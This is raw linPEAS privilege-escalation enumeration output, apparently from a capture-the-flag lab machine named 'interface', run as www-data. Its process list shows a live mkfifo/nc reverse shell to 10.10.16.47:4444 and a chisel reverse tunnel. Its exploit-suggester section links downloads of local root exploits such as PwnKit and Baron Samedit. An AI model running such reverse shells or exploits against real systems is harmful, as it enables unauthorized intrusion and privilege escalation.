bash /tmp/linpeas.sh -M -e -L -t
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username

Starting linpeas. Caching Writable Folders...

╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 4.15.0-202-generic (buildd@lcy02-amd64-115) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: interface
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe
DONE

╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.15.0-202-generic (buildd@lcy02-amd64-115) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023
Distributor ID: Ubuntu
Description: Ubuntu 18.04.6 LTS
Release: 18.04
Codename: bionic

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.21p2

╔══════════╣ CVEs Check
Potentially Vulnerable to CVE-2022-2588

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin

╔══════════╣ Date & uptime
Sun Feb 12 11:11:57 UTC 2023
11:11:57 up 2:14, 0 users, load average: 0.16, 0.22, 0.30

╔══════════╣ System stats
Filesystem Size Used Avail Use% Mounted on
udev 952M 0 952M 0% /dev
tmpfs 197M 9.8M 187M 5% /run
/dev/mapper/ubuntu--vg-ubuntu--lv 3.5G 3.1G 340M 91% /
tmpfs 984M 4.0K 984M 1% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 984M 0 984M 0% /sys/fs/cgroup
/dev/sda2 219M 149M 53M 74% /boot
total used free shared buff/cache available
Mem: 2014888 269756 424972 14864 1320160 1542560
Swap: 1048572 268 1048304

╔══════════╣ CPU info
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 2
On-line CPU(s) list: 0,1
Thread(s) per core: 1
Core(s) per socket: 1
Socket(s): 2
NUMA node(s): 1
Vendor ID: GenuineIntel
CPU family: 6
Model: 85
Model name: Intel(R) Xeon(R) Gold 5218 CPU @ 2.30GHz
Stepping: 7
CPU MHz: 2294.609
BogoMIPS: 4589.21
Hypervisor vendor: VMware
Virtualization type: full
L1d cache: 32K
L1i cache: 32K
L2 cache: 1024K
L3 cache: 22528K
NUMA node0 CPU(s): 0,1
Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon nopl xtopology tsc_reliable nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 invpcid avx512f avx512dq rdseed adx smap clflushopt clwb avx512cd avx512bw avx512vl xsaveopt xsavec xsaves arat pku ospke md_clear flush_l1d arch_capabilities

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
/dev/disk/by-id/dm-uuid-LVM-i3pCcRu1s0TOrvFh0JfLWwVAmyM66tqgFue8hxoPZWT54KAfm6w6w9SmET94QCTF / ext4 defaults 0 0
/dev/disk/by-uuid/9a15dfee-5052-4de7-86fb-b3ec2b2069ec /boot ext4 defaults 0 0
/dev/mapper/ubuntu--vg-swap none swap sw 0 0

╔══════════╣ Environment
╚ Any private information inside environment variables?
LANG=C
USER=www-data
PWD=/var/www/.gnupg
HOME=/var/www
HISTFILE=/dev/null
SHLVL=1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
HISTSIZE=0
HISTFILESIZE=0
_=/usr/bin/env

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2018-18955] subuid_shell

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
   Comments: CONFIG_USER_NS needs to be enabled

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
   https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.

╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2

╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)

╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
/usr/bin/lxc
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No

╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS Lambda? .......................... No

╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.0 0.4 159652 8792 ? Ss 08:57 0:03 /sbin/init maybe-ubiquity
root 524 0.2 0.8 95016 16212 ? S<s 08:57 0:16 /lib/systemd/systemd-journald
root 534 0.0 0.0 105908 1868 ? Ss 08:57 0:00 /sbin/lvmetad -f
root 551 0.0 0.2 46444 5156 ? Ss 08:57 0:01 /lib/systemd/systemd-udevd
root 750 0.0 0.0 31984 1880 ? S<sl 08:57 0:04 /sbin/auditd
systemd+ 769 0.0 0.1 141788 3008 ? Ssl 08:57 0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root 887 0.0 0.4 91020 9952 ? Ss 08:57 0:00 /usr/bin/VGAuthService
root 900 0.1 0.3 225744 7516 ? S<sl 08:57 0:10 /usr/bin/vmtoolsd
systemd+ 1059 0.0 0.2 71728 5132 ? Ss 08:57 0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+ 1139 0.0 0.2 70756 5896 ? Ss 08:57 0:01 /lib/systemd/systemd-resolved
root 1166 0.0 0.1 25996 3520 ? Ss 08:57 0:00 /sbin/dhclient -1 -4 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 1270 0.0 0.1 30032 3248 ? Ss 08:57 0:00 /usr/sbin/cron -f
root 1286 0.0 0.1 110552 2028 ? Ssl 08:57 0:00 /usr/sbin/irqbalance --foreground
daemon 1287 0.0 0.1 28336 2468 ? Ss 08:57 0:00 /usr/sbin/atd -f
www-data 1288 0.0 2.0 764896 40944 ? Ssl 08:57 0:00 npm
www-data 1758 0.0 0.0 4640 876 ? S 08:57 0:00 _ sh -c next start --hostname 127.0.0.1
www-data 1759 0.0 3.1 11271332 63244 ? Sl 08:57 0:01 _ node /var/www/starting-page/blog/node_modules/.bin/next start --hostname 127.0.0.1
root 1289 0.0 0.3 286240 6708 ? Ssl 08:57 0:00 /usr/lib/accountsservice/accounts-daemon
root 1290 0.0 1.0 322720 20740 ? Ss 08:57 0:00 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
www-data 1386 0.0 1.0 325212 21460 ? S 08:57 0:00 _ php-fpm: pool www
www-data 3166 0.0 0.0 4636 860 ? S 10:41 0:00 | _ sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.47 4444 >/tmp/f
www-data 3169 0.0 0.0 4680 816 ? S 10:41 0:00 | _ cat /tmp/f
www-data 3170 0.0 0.0 4636 1676 ? S 10:41 0:00 | _ sh -i
www-data 3189 0.1 0.2 9760 4320 ? Sl 10:42 0:03 | | _ /tmp/NJwcm
www-data 14831 0.0 0.0 4636 828 ? S 10:47 0:00 | | _ /bin/sh
www-data 14832 0.0 0.2 20344 5148 ? S 10:47 0:00 | | | _ bash /tmp/linpeas.sh -M -e -L -t
www-data 39396 0.0 0.2 20344 4084 ? S 11:00 0:00 | | | | _ bash /tmp/linpeas.sh -M -e -L -t
www-data 40732 0.0 0.2 20344 4204 ? S 11:00 0:00 | | | | _ bash /tmp/linpeas.sh -M -e -L -t
www-data 40734 0.0 0.0 11468 1016 ? S 11:00 0:00 | | | | _ grep -A 256 Ports going to be scanned
www-data 40735 0.0 0.0 11468 1088 ? S 11:00 0:00 | | | | _ grep -v Ports going to be scanned
www-data 14833 0.0 0.0 4544 828 ? S 10:47 0:00 | | | _ tee /tmp/peas.log
www-data 22118 0.0 0.0 4636 820 ? S 10:51 0:00 | | _ /bin/sh
www-data 22141 0.0 0.4 718304 8292 ? Sl 10:52 0:00 | | | _ ./chisel client 10.10.16.47:8000 R:3000:127.0.0.1:3000
www-data 44089 0.0 0.0 4636 880 ? S 11:11 0:00 | | _ /bin/sh
www-data 44091 0.7 0.2 20344 5180 ? S 11:11 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t
www-data 47476 0.0 0.1 20344 3900 ? S 11:12 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t
www-data 47479 0.0 0.1 37020 3520 ? R 11:12 0:00 | | | _ ps fauxwww
www-data 47480 0.0 0.1 20344 2332 ? S 11:12 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t
www-data 3171 0.0 0.1 15720 2108 ? S 10:41 0:00 | _ nc 10.10.16.47 4444
www-data 1387 0.0 1.0 325212 20564 ? S 08:57 0:00 _ php-fpm: pool www
message+ 1292 0.0 0.2 50132 4620 ? Ss 08:57 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root 1348 0.1 0.1 457232 2036 ? Ssl 08:57 0:08 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 1382 0.0 0.2 263048 4388 ? Ssl 08:57 0:00 /usr/sbin/rsyslogd -n
root 1399 0.0 0.8 169524 17548 ? Ssl 08:57 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 1402 0.0 0.2 62012 5548 ? Ss 08:57 0:00 /lib/systemd/systemd-logind
root 1477 0.0 0.2 72304 5760 ? Ss 08:57 0:00 /usr/sbin/sshd -D
root 1478 0.0 0.3 288884 6584 ? Ssl 08:57 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 1498 0.0 0.0 14896 1924 tty1 Ss+ 08:57 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 1625 0.0 0.0 142884 1584 ? Ss 08:57 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 1627 0.0 0.3 145180 6296 ? S 08:57 0:00 _ nginx: worker process
www-data 1628 0.0 0.3 145180 7248 ? S 08:57 0:00 _ nginx: worker process
www-data 3196 0.0 0.2 20340 5056 ? S 10:43 0:00 bash /tmp/linpeas.sh -M -e -L -t
www-data 10388 0.0 0.1 20340 3900 ? S 10:45 0:00 _ bash /tmp/linpeas.sh -M -e -L -t
www-data 11709 0.0 0.2 20340 4128 ? S 10:45 0:00 _ bash /tmp/linpeas.sh -M -e -L -t
www-data 11711 0.0 0.0 11468 1048 ? S 10:45 0:00 _ grep -A 256 Ports going to be scanned
www-data 11712 0.0 0.0 11468 980 ? S 10:45 0:00 _ grep -v Ports going to be scanned
root 9709 0.0 0.0 4560 756 ? Ss 10:44 0:00 /usr/sbin/acpid
uuidd 9948 0.0 0.0 26856 1456 ? Ss 10:44 0:00 /usr/sbin/uuidd --socket-activation
www-data 22149 0.1 0.2 21276 6000 ? S 10:53 0:01 bash linpeas.sh
www-data 39291 0.0 0.0 11076 1064 ? S 10:54 0:00 _ aureport --tty
www-data 39292 0.0 0.0 11468 1032 ? S 10:54 0:00 _ grep -E su |sudo
www-data 29484 0.0 0.0 90388 716 ? Ss 10:54 0:00 gpg-agent --homedir /var/www/.gnupg --use-standard-socket --daemon

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Jan 16 09:49 .
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 589 Jan 14 2020 mdadm
-rw-r--r-- 1 root root 712 Jan 11 2022 php
-rw-r--r-- 1 root root 191 Aug 6 2020 popularity-contest

/etc/cron.daily:
total 60
drwxr-xr-x 2 root root 4096 Feb 6 10:02 .
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 539 Feb 23 2021 apache2
-rwxr-xr-x 1 root root 376 Nov 11 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Jan 16 09:49 .
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Jan 16 09:49 .
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Feb 6 10:01 .
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 403 Aug 23 2021 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

╔══════════╣ Services
╚ Search for outdated versions
[ + ] acpid
[ + ] apache-htcacheclean
[ - ] apache2
[ + ] apparmor
[ + ] apport
[ + ] atd
[ + ] auditd
[ - ] console-setup.sh
[ + ] cron
[ - ] cryptdisks
[ - ] cryptdisks-early
[ + ] dbus
[ + ] ebtables
[ + ] grub-common
[ - ] hwclock.sh
[ + ] irqbalance
[ + ] iscsid
[ - ] keyboard-setup.sh
[ + ] kmod
[ - ] lvm2
[ + ] lvm2-lvmetad
[ + ] lvm2-lvmpolld
[ + ] lxcfs
[ - ] lxd
[ - ] mdadm
[ - ] mdadm-waitidle
[ + ] networking
[ + ] nginx
[ - ] open-iscsi
[ + ] open-vm-tools
[ + ] php7.4-fpm
[ - ] plymouth
[ - ] plymouth-log
[ + ] procps
[ - ] rsync
[ + ] rsyslog
[ - ] screen-cleanup
[ + ] ssh
[ + ] udev
[ + ] uuidd

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service is executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2023-02-12 11:39:00 UTC 26min left Sun 2023-02-12 11:09:02 UTC 3min 27s ago phpsessionclean.timer phpsessionclean.service
Sun 2023-02-12 11:53:35 UTC 41min left Sun 2023-02-12 08:57:52 UTC 2h 14min ago motd-news.timer motd-news.service
Sun 2023-02-12 15:22:31 UTC 4h 10min left Sun 2023-02-12 09:17:20 UTC 1h 55min ago ua-timer.timer ua-timer.service
Sun 2023-02-12 18:24:06 UTC 7h left Sun 2023-02-12 08:57:52 UTC 2h 14min ago apt-daily.timer apt-daily.service
Mon 2023-02-13 00:00:00 UTC 12h left Mon 2023-02-06 09:52:53 UTC 6 days ago fstrim.timer fstrim.service
Mon 2023-02-13 06:56:31 UTC 19h left Sun 2023-02-12 08:57:52 UTC 2h 14min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2023-02-13 09:12:42 UTC 22h left Sun 2023-02-12 09:12:42 UTC 1h 59min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/cloud-init.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/run/acpid.socket
  └─(Read Write - Can Connect)
/run/dbus/system_bus_socket
  └─(Read Write - Can Connect)
/run/lvm/lvmetad.socket
  └─( - Cannot Connect)
/run/lvm/lvmpolld.socket
  └─( - Cannot Connect)
/run/php/php7.4-fpm.sock
  └─(Read Write - Can Connect)
/run/snapd-snap.socket
  └─(Read Write - Can Connect)
/run/snapd.socket
  └─(Read Write - Can Connect)
/run/systemd/journal/dev-log
  └─(Read Write - Can Connect)
/run/systemd/journal/socket
  └─(Read Write - Can Connect)
/run/systemd/journal/stdout
  └─(Read Write - Can Connect)
/run/systemd/journal/syslog
  └─(Read Write - Can Connect)
/run/systemd/notify
  └─(Read Write - Can Connect)
/run/systemd/private
  └─(Read Write - Can Connect)
/run/udev/control
  └─( - Cannot Connect)
/run/uuidd/request
  └─(Read Write - Can Connect)
/run/vmware/guestServicePipe
  └─(Read Write - Can Connect)
/var/lib/lxd/unix.socket
  └─( - Cannot Connect)
/var/run/dbus/system_bus_socket
  └─(Read Write - Can Connect)
/var/run/vmware/guestServicePipe
  └─(Read Write - Can Connect)
/var/www/.gnupg/S.gpg-agent
  └─(Read Write - Can Connect)
/var/www/.gnupg/S.gpg-agent.browser
  └─(Read Write - Can Connect)
/var/www/.gnupg/S.gpg-agent.extra
  └─(Read Write - Can Connect)
/var/www/.gnupg/S.gpg-agent.ssh
  └─(Read Write - Can Connect)

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( <policy user="dnsmasq">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 1059 systemd-network systemd-network :1.0 systemd-networkd.service - -
:1.1 1139 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
:1.2 1 systemd root :1.2 init.scope - -
:1.3 1289 accounts-daemon root :1.3 accounts-daemon.service - -
:1.433 51087 snapd root :1.433 snapd.service - -
:1.434 51158 systemd-timedat root :1.434 systemd-timedated.service - -
:1.436 51415 busctl www-data :1.436 php7.4-fpm.service - -
:1.5 1402 systemd-logind root :1.5 systemd-logind.service - -
:1.6 1478 polkitd root :1.6 polkit.service - -
:1.7 1399 networkd-dispat root :1.7 networkd-dispatcher.se…ce - -
com.ubuntu.LanguageSelector - - - (activatable) - -
com.ubuntu.SoftwareProperties - - - (activatable) - -
org.freedesktop.Accounts 1289 accounts-daemon root :1.3 accounts-daemon.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.PolicyKit1 1478 polkitd root :1.6 polkit.service - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 1402 systemd-logind root :1.5 systemd-logind.service - -
org.freedesktop.network1 1059 systemd-network systemd-network :1.0 systemd-networkd.service - -
org.freedesktop.resolve1 1139 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.2 init.scope - -
org.freedesktop.thermald - - - (activatable) - -
org.freedesktop.timedate1 51158 systemd-timedat root :1.434 systemd-timedated.service - -

╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
interface
127.0.0.1 localhost interface interface.htb
127.0.1.1 interface

::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0

